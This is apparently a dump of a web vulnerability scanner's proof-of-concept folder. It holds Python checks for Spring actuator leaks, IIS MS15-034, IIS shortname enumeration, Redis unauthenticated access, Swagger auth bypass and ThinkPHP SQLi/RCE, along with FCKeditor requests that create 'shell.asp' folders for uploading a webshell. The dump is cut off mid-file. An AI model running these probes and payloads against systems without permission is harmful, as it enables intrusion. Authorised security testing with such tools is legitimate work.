e&Connector=http://www.site.com//editor/filemanager/connectors/php/connector.php','/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com//editor/filemanager/connectors/asp/connector.asp','/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com//editor/filemanager/connectors/aspx/connector.aspx','/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com//editor/filemanager/connectors/jsp/connector.jsp','/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp','/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.jsp','/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/aspx/connector.Aspx','/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/php/connector.php','/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=File&CurrentFolder=/shell.asp&NewFolderName=z.asp','/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/shell.asp&NewFolderName=z&uuid=1244789975684','/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolder&CurrentFolder=/&Type=Image&NewFolderName=shell.asp','/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../../&NewFolderName=shell.asp','/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=e:/'] 8 | VUL_LIST = [] 9 | 10 | """ 11 | :查找spring敏感路径泄露信息 12 | """ 13 | def spider(urls,time): 14 | """ 15 | :return:VUL_LIST 16 | """ 17 | s = requests.session() 18 | s.trust_env = False 19 | s.verify = False 20 | status_code = None 21 | s.headers = { 22 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8', 23 | 'Accept-Encoding': 'gzip, deflate, br', 24 | 'Accept-Language': 'zh-CN,zh;q=0.9', 25 | 'Connection': 'close', 26 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.75 Safari/537.36' 27 | } 28 | for path in Fck_path_list: 29 | urls_path = urls + path 30 | #urls = 'http://110.53.243.248:9006/swagger-ui.html' 31 | try: 32 | content = s.get(urls_path, headers=s.headers, timeout=time, allow_redirects=False) 33 | status_code = content.status_code 34 | if status_code != 404: 35 | VUL_LIST.append(path) 36 | color('[+] %s %s'%(urls_path,str(status_code)),'green') 37 | else: 38 | color('[-] %s %s'%(urls_path,str(status_code)),'red') 39 | except Exception as e: 40 | print('[-] 请求 %s 出现异常 %s'%(urls_path,type(e))) 41 | continue 42 | return VUL_LIST 43 | 44 | def check(**kwargs): 45 | try: 46 | urls = kwargs['url']#/*str*/ 47 | urls = urls.strip('/') 48 | VUL_LIST = spider(urls, 3) 49 | 50 | if '/jolokia' in VUL_LIST or '/actuator/jolokia' in VUL_LIST: 51 | print('https://github.com/LandGrey/SpringBootVulExploit') 52 | print('0x03:获取被星号脱敏的密码的明文 (方法一)') 53 | print('0x04:jolokia logback JNDI RCE') 54 | print('0x05:jolokia Realm JNDI RCE') 55 | 56 | elif '/env' in VUL_LIST and '/refresh' in VUL_LIST: 57 | print('https://github.com/LandGrey/SpringBootVulExploit') 58 | print('0x04:获取被星号脱敏的密码的明文 (方法二)') 59 | print('0x05:获取被星号脱敏的密码的明文 (方法三)') 60 | print('0x02:spring cloud SnakeYAML RCE') 61 | print('0x03:eureka xstream deserialization RCE') 62 | print('0x06:h2 database query RCE') 63 | print('0x08:mysql jdbc deserialization RCE') 64 | 65 | elif '/heapdump' in VUL_LIST or '/actuator/heapdump' in VUL_LIST: 66 | print('https://github.com/LandGrey/SpringBootVulExploit') 67 | print('0x06:获取被星号脱敏的密码的明文 (方法四)') 68 | else: 69 | print('[-] 未找到相关漏洞信息, 请参阅: https://github.com/LandGrey/SpringBootVulExploit') 70 | #print(VUL_LIST) 71 | return VUL_LIST 72 | except Exception as e: 73 | print('脚本执行出错 %s'%e) 74 | 75 | if __name__ == "__main__": 76 | a = check(**{'url':'http://www.baidu.com'}) 77 | #print(a) 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | -------------------------------------------------------------------------------- /POC/IIS_MS15-034_Range_bytes.py: -------------------------------------------------------------------------------- 1 | try: 2 | import requests 3 | import sys 4 | except ImportError as ierr: 5 | print("Error, looks like you don';t have %s installed", ierr) 6 | 7 | def identify_iis(domain): 8 | req = requests.get(str(domain), verify=False) 9 | remote_server = req.headers['server'] 10 | 11 | if "Microsoft-IIS" in remote_server: 12 | print("[+] 服务是 " + remote_server) 13 | ms15_034_test(str(domain)) 14 | else: 15 | print("[-] 不是IIS\n可能是: " + remote_server) 16 | 17 | def ms15_034_test(domain): 18 | print("[*] 启动vuln检查!") 19 | headers = {"Range":"bytes=0-18446744073709551615"} 20 | #vuln_buffer = "GET / HTTP/1.1\r\nHost: stuff\r\nRange: bytes=0-18446744073709551615\r\n\r\n"; 21 | try: 22 | req = requests.get(str(domain), headers=headers, verify=False) 23 | if "Requested Range Not Satisfiable" in str(req.content): 24 | print("[+] 存在漏洞") 25 | return 1 26 | else: 27 | print("[-] IIS服务无法显示漏洞是否存在. "+"需要手动检测") 28 | return 29 | except Exception as e: 30 | print('发生错误%s'%e) 31 | 32 | print("[*]用法:Range: bytes=0-18446744073709551615") 33 | def check(**kwargs): 34 | result = ms15_034_test(kwargs['url']) 35 | return result 36 | if __name__ == '__main__': 37 | identify_iis(sys.argv[1]) 38 | 39 | 40 | 41 | -------------------------------------------------------------------------------- /POC/IIS_shortname_Scan.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding:utf-8 3 | # An IIS short_name scanner my[at]lijiejie.com http://www.lijiejie.com 4 | 5 | 6 | import sys 7 | import http.client 8 | from urllib import parse 9 | import threading 10 | import queue as Queue 11 | import time 12 | 13 | 14 | class Scanner(): 15 | def __init__(self, target): 16 | self.target = target.lower() 17 | if not self.target.startswith('http'): 18 | self.target = 'http://%s' % self.target 19 | self.scheme, self.netloc, self.path, params, query, fragment = \ 20 | parse.urlparse(target) 21 | if self.path[-1:] != '/': # ends with slash 22 | self.path += '/' 23 | self.alphanum = 'abcdefghijklmnopqrstuvwxyz0123456789_-' 24 | self.files = [] 25 | self.dirs = [] 26 | self.queue = Queue.Queue() 27 | self.lock = threading.Lock() 28 | self.threads = [] 29 | self.request_method = '' 30 | self.msg_queue = Queue.Queue() 31 | self.STOP_ME = False 32 | threading.Thread(target=self._print).start() 33 | 34 | def _conn(self): 35 | try: 36 | if self.scheme == 'https': 37 | conn = http.client.HTTPSConnection(self.netloc) 38 | else: 39 | conn = http.client.HTTPConnection(self.netloc) 40 | return conn 41 | except Exception as e: 42 | print('[_conn.Exception]%s'%e) 43 | return None 44 | 45 | def _get_status(self, path): 46 | try: 47 | conn = self._conn() 48 | conn.request(self.request_method, path) 49 | status = conn.getresponse().status 50 | conn.close() 51 | return status 52 | except Exception as e: 53 | raise Exception('[_get_status.Exception] %s' % str(e) ) 54 | 55 | def is_vul(self): 56 | try: 57 | for _method in ['GET', 'OPTIONS']: 58 | self.request_method = _method 59 | status_1 = self._get_status(self.path + '/*~1*/a.aspx') # an existed file/folder 60 | status_2 = self._get_status(self.path + '/l1j1e*~1*/a.aspx') # not existed file/folder 61 | if status_1 == 404 and status_2 != 404: 62 | return True 63 | return False 64 | except Exception as e: 65 | raise Exception('[is_vul.Exception] %s' % str(e) ) 66 | 67 | def run(self): 68 | for c in self.alphanum: 69 | self.queue.put( (self.path + c, '.*') ) # filename, extension 70 | for i in range(20): 71 | t = threading.Thread(target=self._scan_worker) 72 | self.threads.append(t) 73 | t.start() 74 | for t in self.threads: 75 | t.join() 76 | self.STOP_ME = True 77 | 78 | def report(self): 79 | print('-'*64) 80 | for d in self.dirs: 81 | print('Dir: %s' % d) 82 | for f in self.files: 83 | print('File: %s' % f) 84 | print('-'*64) 85 | print('%d Directories, %d Files found in total' % (len(self.dirs), len(self.files))) 86 | print('Note that * is a wildcard, matches any character zero or more times.') 87 | 88 | def _print(self): 89 | while not self.STOP_ME or (not self.msg_queue.empty()): 90 | if self.msg_queue.empty(): 91 | time.sleep(0.05) 92 | else: 93 | print(self.msg_queue.get()) 94 | 95 | def _scan_worker(self): 96 | while True: 97 | try: 98 | url, ext = self.queue.get(timeout=1.0) 99 | status = self._get_status(url + '*~1' + ext + '/1.aspx') 100 | if status == 404: 101 | self.msg_queue.put('[+] %s~1%s\t[scan in progress]' % (url, ext)) 102 | 103 | if len(url) - len(self.path)< 6: # enum first 6 chars only 104 | for c in self.alphanum: 105 | self.queue.put( (url + c, ext) ) 106 | else: 107 | if ext == '.*': 108 | self.queue.put( (url, '') ) 109 | 110 | if ext == '': 111 | self.dirs.append(url + '~1') 112 | self.msg_queue.put('[+] Directory ' + url + '~1\t[Done]') 113 | 114 | elif len(ext) == 5 or (not ext.endswith('*')): # .asp* 115 | self.files.append(url + '~1' + ext) 116 | self.msg_queue.put('[+] File ' + url + '~1' + ext + '\t[Done]') 117 | 118 | else: 119 | for c in 'abcdefghijklmnopqrstuvwxyz0123456789': 120 | self.queue.put( (url, ext[:-1] + c + '*') ) 121 | if len(ext) < 4: # < len('.as*') 122 | self.queue.put( (url, ext[:-1] + c) ) 123 | 124 | except Queue.Empty as e: 125 | break 126 | except Exception as e: 127 | print('[Exception]', e) 128 | 129 | print('[*]用法: [URL]') 130 | def check(**kwargs): 131 | s = Scanner(kwargs['url']) 132 | if not s.is_vul(): 133 | s.STOP_ME = True 134 | print('[-] 目标不存在IIS短文件漏洞') 135 | #return 136 | else: 137 | print('[+] 目标存在IIS短文件漏洞') 138 | #return 1 139 | s.run() 140 | s.report() 141 | 142 | 143 | 144 | if __name__ == '__main__': 145 | if len(sys.argv) == 1: 146 | print('Usage: python IIS_shortname_Scan.py http://www.target.com/') 147 | sys.exit() 148 | 149 | target = sys.argv[1] 150 | s = Scanner(target) 151 | if not s.is_vul(): 152 | s.STOP_ME = True 153 | print('Server is not vulnerable') 154 | sys.exit(0) 155 | 156 | print('Server is vulnerable, please wait, scanning...') 157 | s.run() 158 | s.report() 159 | 160 | 161 | 162 | 163 | 164 | 165 | 166 | -------------------------------------------------------------------------------- /POC/JSencode.py: -------------------------------------------------------------------------------- 1 | #coding:utf-8 2 | import os 3 | import execjs 4 | import threading 5 | 6 | passfile = "top100password.txt" 7 | jsfile = "md5.js" 8 | encode_fun = "hex_md5" 9 | 10 | 11 | def info(): 12 | #os.environ["EXECJS_RUNTIME"] = 'Phantomjs' 13 | print("[+]============================================================") 14 | print("[+] Python调用JS加密password文件内容 ") 15 | print("[+] passfile : 密码字典 ") 16 | print("[+] jsfile : JS文件 ") 17 | print("[+] encode_fun : 加密函数 ") 18 | print("[+]============================================================") 19 | print(" ") 20 | 21 | def Encode(jsfile, passfile): 22 | os.environ["EXECJS_RUNTIME"] = 'Phantomjs' 23 | jsfile = './POC/js_examples/' + jsfile 24 | passfile = './POC/js_examples/' + passfile 25 | #jsfile = './js_examples/' + jsfile 26 | #passfile = './js_examples/' + passfile 27 | print("[+] 正在进行加密,请稍后......") 28 | with open (jsfile,'r') as strjs: 29 | src = strjs.read() 30 | #phantom = execjs.get('PhantomJS') #调用JS依赖环境 31 | #getpass = phantom.compile(src) #编译执行js脚本 32 | getpass = execjs.compile(src) 33 | with open(passfile, 'r') as strpass: 34 | for passwd in strpass.readlines(): 35 | try: 36 | passwd = passwd.strip() 37 | mypass = getpass.call(encode_fun, passwd) #传递参数 38 | print("[+] %s 加密完成: %s"%(passwd,mypass)) 39 | except: 40 | print("[-] %s 加密失败"%passwd) 41 | continue 42 | print("[+] 加密完成") 43 | 44 | #对单一密码进行加密 45 | def passstring(jsfile, password): 46 | print("[+] 正在进行加密,请稍后......") 47 | with open (jsfile,'r') as strjs: 48 | src = strjs.read() 49 | phantom = execjs.get('PhantomJS') #调用JS依赖环境 50 | getpass = phantom.compile(src) #编译执行js脚本 51 | mypass = getpass.call(encode_fun, password) #传递参数 52 | print("[+] 加密完成:{}".format(mypass)) 53 | 54 | info() 55 | def check(**kwargs): 56 | t = threading.Thread(target=Encode, args=(jsfile, passfile)) 57 | t.start() 58 | 59 | if __name__ == "__main__": 60 | check(**{"1":"1"}) 61 | 62 | 63 | 64 | 65 | 66 | -------------------------------------------------------------------------------- /POC/Nginx_iis_scan.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: UTF-8 -*- 3 | import requests 4 | import urllib3 5 | import threading 6 | import queue 7 | import sys,getopt 8 | sys.path.append('../') 9 | from ClassCongregation import _urlparse 10 | 11 | error=20 #误差值(5~10),此参数不用修改,已最优。 12 | urllib3.disable_warnings() 13 | 14 | def Nginx_iis_scan(url): 15 | try: 16 | path = '/.php' 17 | path2 = '/.232index'#异常测试时需要,能降低防止误报 18 | res=requests.get(url=url+path,verify=False,timeout=5) 19 | count=len(res.text) 20 | if res.status_code==200:#判断响应值 21 | res2 = requests.get(url=url + path2, verify=False, timeout=5) 22 | count2=len(res2.text) 23 | sum=count-count2 24 | if error>=abs(sum):#获取绝对值,计算误差。 25 | print(url + path2 + ' No Loophole') 26 | else: 27 | print(url+' 确定存在解析漏洞') 28 | return True 29 | else: 30 | print(url+path+' '+str(res.status_code)) 31 | except Exception as e: 32 | print(url,str(e)) 33 | 34 | print('[*]请输入目标服务器上存在的静态资源文件链接,如 http://www.baidu.com/robots.txt') 35 | def check(**kwargs): 36 | Nginx_iis_scan(kwargs['url']) 37 | 38 | if __name__ == "__main__": 39 | Nginx_iis_scan(_urlparse("http://baidu.com/123.php")) 40 | print('task complete~~~~~~~~~~ 完了') 41 | 42 | 43 | 44 | -------------------------------------------------------------------------------- /POC/Redis_unauthorized_access.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | 5 | vuln = ['redis', '6379'] 6 | 7 | print('[*]Usage: [IP]') 8 | def check(**kwargs): 9 | ip = kwargs['ip'] 10 | port = int(6379) 11 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 12 | s.settimeout(5) 13 | try: 14 | s.connect((ip, port)) 15 | payload = b'\x2a\x31\x0d\x0a\x24\x34\x0d\x0a\x69\x6e\x66\x6f\x0d\x0a' 16 | s.send(payload) 17 | data = s.recv(1024) 18 | s.close() 19 | if b"redis_version" in data: 20 | print('[+]6379 Redis Unauthorized Access') 21 | else: 22 | print('[-]target is not vulnerable') 23 | except Exception as e: 24 | s.close() 25 | 26 | 27 | 28 | 29 | -------------------------------------------------------------------------------- /POC/Scan_zip.py: -------------------------------------------------------------------------------- 1 | import urllib.parse 2 | import requests 3 | import time 4 | from bs4 import BeautifulSoup 5 | 6 | headers = {"Range":"bytes=0-4999"} 7 | 8 | def check(**kwargs): 9 | root_url = kwargs['url'].strip('/') 10 | try: 11 | req = requests.get(root_url, timeout=1, headers=headers) 12 | content_type_header = req.headers['content-type'] 13 | if '=' in content_type_header: 14 | charset = content_type_header.split('=')[1] 15 | else: 16 | charset = "gb2312" 17 | soup = BeautifulSoup(req.text, 'lxml') #创建 beautifulsoup 对象 18 | system = soup.title.string.encode(charset, errors='ignore').decode(charset) 19 | except Exception as error: 20 | print('[-] 无法获取系统title') 21 | return 22 | system = urllib.parse.quote(system) 23 | year_list = ["2018", "2019", "2020", "2021"] 24 | date_file = ['0101','0102','0103','0104','0105','0106','0107','0108','0109','0110','0111','0112','0113','0114','0115','0116','0117','0118','0119','0120','0121','0122','0123','0124','0125','0126','0127','0128','0129','0130','0131','0201','0202','0203','0204','0205','0206','0207','0208','0209','0210','0211','0212','0213','0214','0215','0216','0217','0218','0219','0220','0221','0222','0223','0224','0225','0226','0227','0228','0229','0230','0231','0301','0302','0303','0304','0305','0306','0307','0308','0309','0310','0311','0312','0313','0314','0315','0316','0317','0318','0319','0320','0321','0322','0323','0324','0325','0326','0327','0328','0329','0330','0331','0401','0402','0403','0404','0405','0406','0407','0408','0409','0410','0411','0412','0413','0414','0415','0416','0417','0418','0419','0420','0421','0422','0423','0424','0425','0426','0427','0428','0429','0430','0431','0501','0502','0503','0504','0505','0506','0507','0508','0509','0510','0511','0512','0513','0514','0515','0516','0517','0518','0519','0520','0521','0522','0523','0524','0525','0526','0527','0528','0529','0530','0531','0601','0602','0603','0604','0605','0606','0607','0608','0609','0610','0611','0612','0613','0614','0615','0616','0617','0618','0619','0620','0621','0622','0623','0624','0625','0626','0627','0628','0629','0630','0631','0701','0702','0703','0704','0705','0706','0707','0708','0709','0710','0711','0712','0713','0714','0715','0716','0717','0718','0719','0720','0721','0722','0723','0724','0725','0726','0727','0728','0729','0730','0731','0801','0802','0803','0804','0805','0806','0807','0808','0809','0810','0811','0812','0813','0814','0815','0816','0817','0818','0819','0820','0821','0822','0823','0824','0825','0826','0827','0828','0829','0830','0831','0901','0902','0903','0904','0905','0906','0907','0908','0909','0910','0911','0912','0913','0914','0915','0916','0917','0918','0919','0920','0921','0922','0923','0924','0925','0926','0927','0928','0929','0930','0931','1001','1002','1003','1004','1005','1006','1007','1008','1009','1010','1011','1012','1013','1014','1015','1016','1017','1018','1019','1020','1021','1022','1023','1024','1025','1026','1027','1028','1029','1030','1031','1101','1102','1103','1104','1105','1106','1107','1108','1109','1110','1111','1112','1113','1114','1115','1116','1117','1118','1119','1120','1121','1122','1123','1124','1125','1126','1127','1128','1129','1130','1131','1201','1202','1203','1204','1205','1206','1207','1208','1209','1210','1211','1212','1213','1214','1215','1216','1217','1218','1219','1220','1221','1222','1223','1224','1225','1226','1227','1228','1229','1230','1231'] 25 | ext_list = [".zip", ".rar"] 26 | for y in year_list: 27 | print("%s年:"%y) 28 | for d in date_file: 29 | for e in ext_list: 30 | url = root_url + '/' +system + y + d.strip() + e 31 | try: 32 | resp = requests.get(url, timeout=1, headers=headers) 33 | if resp.status_code == 404: 34 | print("[-] " + url + ": " + str(resp.status_code)) 35 | else: 36 | raise Exception("?") 37 | except: 38 | print("[?]" + url + ": " + "?") -------------------------------------------------------------------------------- /POC/Swagger-exp.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- encoding: utf-8 -*- 3 | # Swagger REST API Exploit 4 | # By LiJieJie my[at]lijiejie.com 5 | 6 | import requests 7 | import json 8 | import time 9 | from urllib.parse import urlparse 10 | from ClassCongregation import color 11 | 12 | requests.packages.urllib3.disable_warnings() 13 | api_set_list = [] # ALL API SET 14 | scheme = 'http' # default value 15 | headers = {'User-Agent': 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36'} 16 | auth_bypass_detected = False 17 | 18 | 19 | def print_msg(msg, colors='black'): 20 | _msg = '[%s] %s' % (time.strftime('%H:%M:%S', time.localtime()), msg) 21 | color(_msg, colors) 22 | #print(_msg) 23 | 24 | 25 | def find_all_api_set(start_url): 26 | try: 27 | text = requests.get(start_url, headers=headers, verify=False).text 28 | if text.strip().startswith('{"swagger":"'): # from swagger.json 29 | api_set_list.append(start_url) 30 | print_msg('[OK] [API set] %s' % start_url) 31 | with open('./data/api-docs.json', 'w', encoding='utf-8') as f: 32 | f.write(text) 33 | elif text.find('"swaggerVersion"') > 0: # from /swagger-resources/ 34 | base_url = start_url[:start_url.find('/swagger-resources')] 35 | json_doc = json.loads(text) 36 | for item in json_doc: 37 | url = base_url + item['location'] 38 | find_all_api_set(url) 39 | else: 40 | print_msg('[FAIL] Invalid API Doc: %s' % start_url) 41 | except Exception as e: 42 | print_msg('[find_all_api_set] process error %s' % e) 43 | 44 | 45 | def process_doc(url): 46 | try: 47 | json_doc = requests.get(url, headers=headers, verify=False).json() 48 | base_url = scheme + '://' + json_doc['host'] + json_doc['basePath'] 49 | base_url = base_url.rstrip('/') 50 | for path in json_doc['paths']: 51 | 52 | for method in json_doc['paths'][path]: 53 | if method.upper() not in ['GET', 'POST', 'PUT']: 54 | continue 55 | 56 | params_str = '' 57 | sensitive_words = ['url', 'path', 'uri'] 58 | sensitive_params = [] 59 | if 'parameters' in json_doc['paths'][path][method]: 60 | parameters = json_doc['paths'][path][method]['parameters'] 61 | 62 | for parameter in parameters: 63 | para_name = parameter['name'] 64 | # mark sensitive parma 65 | for word in sensitive_words: 66 | if para_name.lower().find(word) >= 0: 67 | sensitive_params.append(para_name) 68 | break 69 | 70 | if 'format' in parameter: 71 | para_format = parameter['format'] 72 | elif 'schema' in parameter and 'format' in parameter['schema']: 73 | para_format = parameter['schema']['format'] 74 | elif 'schema' in parameter and 'type' in parameter['schema']: 75 | para_format = parameter['schema']['type'] 76 | elif 'schema' in parameter and '$ref' in parameter['schema']: 77 | para_format = parameter['schema']['$ref'] 78 | para_format = para_format.replace('#/definitions/', '') 79 | para_format = '{OBJECT_%s}' % para_format 80 | else: 81 | para_format = parameter['type'] if 'type' in parameter else 'unkonwn' 82 | 83 | is_required = '' if parameter['required'] else '*' 84 | params_str += '&%s=%s%s%s' % (para_name, is_required, para_format, is_required) 85 | params_str = params_str.strip('&') 86 | if sensitive_params: 87 | print_msg('[*] Possible vulnerable param found: %s, path is %s' % ( 88 | sensitive_params, base_url+path), 'green') 89 | 90 | scan_api(method, base_url, path, params_str) 91 | except Exception as e: 92 | print_msg('[process_doc error][%s] %s' % (url, e)) 93 | 94 | 95 | def scan_api(method, base_url, path, params_str, error_code=None): 96 | # place holder 97 | _params_str = params_str.replace('*string*', 'a') 98 | _params_str = _params_str.replace('*int64*', '1') 99 | _params_str = _params_str.replace('*int32*', '1') 100 | _params_str = _params_str.replace('=string', '=test') 101 | _params_str = _params_str.replace('*number*', '1') 102 | _params_str = _params_str.replace('*date-time*', '20211104') 103 | _params_str = _params_str.replace('*boolean*', 'false') 104 | 105 | api_url = base_url + path 106 | # url黑名单 107 | sensitive_url = ['delete'] 108 | for url in sensitive_url: 109 | if api_url.lower().find(url) >= 0: 110 | print_msg('[Continue] %s' % (api_url)) 111 | return 112 | if not error_code: 113 | print_msg('[%s] %s %s' % (method.upper(), api_url, params_str)) 114 | if method.upper() == 'GET': 115 | r = requests.get(api_url + '?' + _params_str, headers=headers, verify=False) 116 | if not error_code: 117 | if r.status_code == 200: 118 | print_msg('[Request] %s %s' % (method.upper(), api_url + '?' + _params_str), 'green') 119 | else: 120 | print_msg('[Request] %s %s' % (method.upper(), api_url + '?' + _params_str), 'red') 121 | else: 122 | r = requests.post(api_url, data=_params_str, headers=headers, verify=False) 123 | if not error_code: 124 | if r.status_code == 200: 125 | print_msg('[Request] %s %s \n%s' % (method.upper(), api_url, _params_str), 'green') 126 | else: 127 | print_msg('[Request] %s %s \n%s' % (method.upper(), api_url, _params_str), 'red') 128 | 129 | content_type = r.headers['content-type'] if 'content-type' in r.headers else '' 130 | content_length = r.headers['content-length'] if 'content-length' in r.headers else '' 131 | if not content_length: 132 | content_length = len(r.content) 133 | if not error_code: 134 | print_msg('[Response] Code: %s Content-Type: %s Content-Length: %s' % ( 135 | r.status_code, content_type, content_length)) 136 | else: 137 | #if r.status_code not in [401, 403, 500] or r.status_code != error_code: 138 | if r.status_code not in [401, 403]: 139 | global auth_bypass_detected 140 | auth_bypass_detected = True 141 | print_msg('[VUL] *** URL Auth Bypass ***') 142 | if method.upper() == 'GET': 143 | print_msg('[BypassRequest] [%s] %s Code: %s' % (method.upper(), api_url + '?' + _params_str, r.status_code), 'blue') 144 | else: 145 | print_msg('[BypassRequest] [%s] %s \n%s Code: %s' % (method.upper(), api_url, _params_str, r.status_code), 'blue') 146 | 147 | # Auth Bypass Test, 401,403 bypass 148 | if not error_code and r.status_code in [401, 403]: 149 | path = '/' + path 150 | scan_api(method, base_url, path, params_str, error_code=r.status_code) 151 | 152 | 153 | print('[*] 请输入api-docs.json地址, 将自动对所有接口进行测试!!!') 154 | def check(**kwargs): 155 | global api_set_list 156 | api_set_list.clear() 157 | try: 158 | _scheme = urlparse(kwargs['url']).scheme.lower() 159 | if _scheme.lower() == 'https': 160 | global scheme 161 | scheme = 'https' 162 | find_all_api_set(kwargs['url']) 163 | for url in api_set_list: 164 | process_doc(url) 165 | except Exception as e: 166 | pass 167 | 168 | -------------------------------------------------------------------------------- /POC/TPscan.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # coding=utf-8 3 | from plugins.thinkphp_checkcode_time_sqli import thinkphp_checkcode_time_sqli_verify 4 | from plugins.thinkphp_construct_code_exec import thinkphp_construct_code_exec_verify 5 | from plugins.thinkphp_construct_debug_rce import thinkphp_construct_debug_rce_verify 6 | from plugins.thinkphp_debug_index_ids_sqli import thinkphp_debug_index_ids_sqli_verify 7 | from plugins.thinkphp_driver_display_rce import thinkphp_driver_display_rce_verify 8 | from plugins.thinkphp_index_construct_rce import thinkphp_index_construct_rce_verify 9 | from plugins.thinkphp_index_showid_rce import thinkphp_index_showid_rce_verify 10 | from plugins.thinkphp_invoke_func_code_exec import thinkphp_invoke_func_code_exec_verify 11 | from plugins.thinkphp_lite_code_exec import thinkphp_lite_code_exec_verify 12 | from plugins.thinkphp_method_filter_code_exec import thinkphp_method_filter_code_exec_verify 13 | from plugins.thinkphp_multi_sql_leak import thinkphp_multi_sql_leak_verify 14 | from plugins.thinkphp_pay_orderid_sqli import thinkphp_pay_orderid_sqli_verify 15 | from plugins.thinkphp_request_input_rce import thinkphp_request_input_rce_verify 16 | from plugins.thinkphp_view_recent_xff_sqli import thinkphp_view_recent_xff_sqli_verify 17 | import time,requests 18 | print(''' 19 | ___________ 20 | |_ _| ___ \ 21 | | | | |_/ /__ ___ __ _ _ __ 22 | | | | __/ __|/ __/ _` | '_ \ 23 | | | | | \__ \ (_| (_| | | | | 24 | \_/ \_| |___/\___\__,_|_| |_| 25 | code by Lucifer 26 | ''') 27 | print("用法:http://example.com/{index.php}不需要index.php") 28 | def check(**kwargs): 29 | url = kwargs['url'] 30 | try: 31 | s = requests.session() 32 | s.keep_alive = False 33 | thinkphp_checkcode_time_sqli_verify(url) 34 | time.sleep(0.5) 35 | thinkphp_construct_code_exec_verify(url) 36 | time.sleep(0.5) 37 | thinkphp_construct_debug_rce_verify(url) 38 | time.sleep(0.5) 39 | thinkphp_debug_index_ids_sqli_verify(url) 40 | time.sleep(0.5) 41 | thinkphp_driver_display_rce_verify(url) 42 | time.sleep(0.5) 43 | thinkphp_index_construct_rce_verify(url) 44 | time.sleep(0.5) 45 | thinkphp_index_showid_rce_verify(url) 46 | time.sleep(0.5) 47 | thinkphp_invoke_func_code_exec_verify(url) 48 | time.sleep(0.5) 49 | thinkphp_lite_code_exec_verify(url) 50 | time.sleep(0.5) 51 | thinkphp_method_filter_code_exec_verify(url) 52 | time.sleep(0.5) 53 | thinkphp_multi_sql_leak_verify(url) 54 | time.sleep(0.5) 55 | thinkphp_pay_orderid_sqli_verify(url) 56 | time.sleep(0.5) 57 | thinkphp_request_input_rce_verify(url) 58 | time.sleep(0.5) 59 | thinkphp_view_recent_xff_sqli_verify(url) 60 | except Exception as e: 61 | print("异常对象内容%s"%e) -------------------------------------------------------------------------------- /POC/ThinkAdmin.py: -------------------------------------------------------------------------------- 1 | import requests,sys 2 | 3 | def check(**kwargs): 4 | url = kwargs['url'] 5 | u = url+"/admin.html?s=admin/api.Update/node" 6 | data = {'rules':'["/"]'} 7 | r = requests.post(u,data=data) 8 | if r.status_code == 200: 9 | if "获取文件列表成功" in r.text: 10 | print("[+] %s 存在未授权列目录" % url) 11 | return 1 12 | else: 13 | print("[-] %s 不存在漏洞" %url) 14 | return 15 | if __name__ == "__main__": 16 | if len(sys.argv) == 2: 17 | poc(sys.argv[1]) 18 | else: 19 | print("Usage: python poc.py http://127.0.0.1") 20 | -------------------------------------------------------------------------------- /POC/ThinkphpVersion.py: -------------------------------------------------------------------------------- 1 | # coding=utf-8 2 | from ClassCongregation import color 3 | import requests 4 | import re 5 | 6 | print("用法:http://example.com/{index.php}可选") 7 | pathdict = [ 8 | '?s=index2/index/index', 9 | '?s=index/index/index', 10 | ] 11 | 12 | def check(**kwargs): 13 | url = kwargs['url'].strip('/') 14 | headers = { 15 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0', 16 | 'Connection': 'close', 17 | 'Accept-Encoding': 'gzip, deflate', 18 | 'Accept': '*/*',} 19 | for path in pathdict: 20 | try: 21 | r = requests.get(url + path, headers=headers, timeout=5, verify=False) 22 | if (re.findall('ThinkPHP', r.text, flags=re.IGNORECASE)) or ('系统发生错误' in r.text) or ('无法载入模组' in r.text): 23 | try: 24 | version =re.search(r'([356]\.)([012]\.)(\d{1,2})',r.text).group() 25 | except Exception: 26 | version = '?.?.?' 27 | try: 28 | r_title = requests.get(url, headers=headers, timeout=5, verify=False) 29 | title = "".join(re.findall('(.+)',r_title.text)) 30 | except Exception: 31 | title = '?.?.?' 32 | 33 | color('[+] ThinkPHP V%s | '%version + url +' | '+title, 'green') 34 | return 'ThinkPHP V'+version 35 | except Exception: 36 | color('[-] Request error | ' + url + path, 'red') 37 | #color("[*] %s request error!"%(url + path), 'red') 38 | #continue 39 | color('[-] No ThinkPHP | ' + url, 'red') 40 | return 'None' 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 | -------------------------------------------------------------------------------- /POC/Thinkphp_5_0_23_rce.py: -------------------------------------------------------------------------------- 1 | # coding=utf-8 2 | import random,sys 3 | 4 | #from lib.Requests import Requests 5 | import requests 6 | vuln = ['ThinkPHP', 'ThinkSNS'] 7 | random_num = ''.join(str(i) for i in random.sample(range(0, 9), 8)) 8 | 9 | print('thinkphp v5.x 